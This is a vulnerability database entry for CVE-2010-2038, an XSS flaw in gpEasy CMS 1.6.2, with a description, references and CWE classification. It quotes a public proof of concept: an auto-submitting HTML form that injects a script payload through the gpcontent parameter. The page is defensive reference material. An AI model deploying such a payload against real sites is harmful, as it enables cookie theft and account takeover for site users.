CVE-2010-2038
Description
Cross-site scripting (XSS) vulnerability in include/tool/editing_files.php in gpEasy CMS 1.6.2 allows remote authenticated users, with Edit privileges, to inject arbitrary web script or HTML via the gpcontent parameter to index.php. NOTE: some of these details are obtained from third party information.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
gpEasy CMS 1.6.2 - 'editing_files.php' Cross-Site Scripting
source: https://www.securityfocus.com/bid/40330/info
gpEasy CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to gpEasy CMS 1.6.3 are vulnerable
<form method="POST" action="http://example.com/index.php/Home" name="myfrm">
<input type="hidden" name="cmd" value='save'>
<input type="hidden" name="gpcontent" value='text"><script>alert(document.cookie)</script>'>
</form>
<script>
document.myfrm.submit();
</script>
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| gpeasy | gpeasy_cms | 1.6.2 | |
References
- http://packetstormsecurity.org/1005-exploits/gpeasycms-xss.txt
- http://secunia.com/advisories/39643
- http://www.htbridge.ch/advisory/xss_vulnerability_in_gpeasy_cms.html
- http://www.securityfocus.com/archive/1/511388/100/0/threaded
- http://www.securityfocus.com/bid/40330
- http://packetstormsecurity.org/1005-exploits/gpeasycms-xss.txt
- http://secunia.com/advisories/39643
- http://www.htbridge.ch/advisory/xss_vulnerability_in_gpeasy_cms.html
- http://www.securityfocus.com/archive/1/511388/100/0/threaded
- http://www.securityfocus.com/bid/40330
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.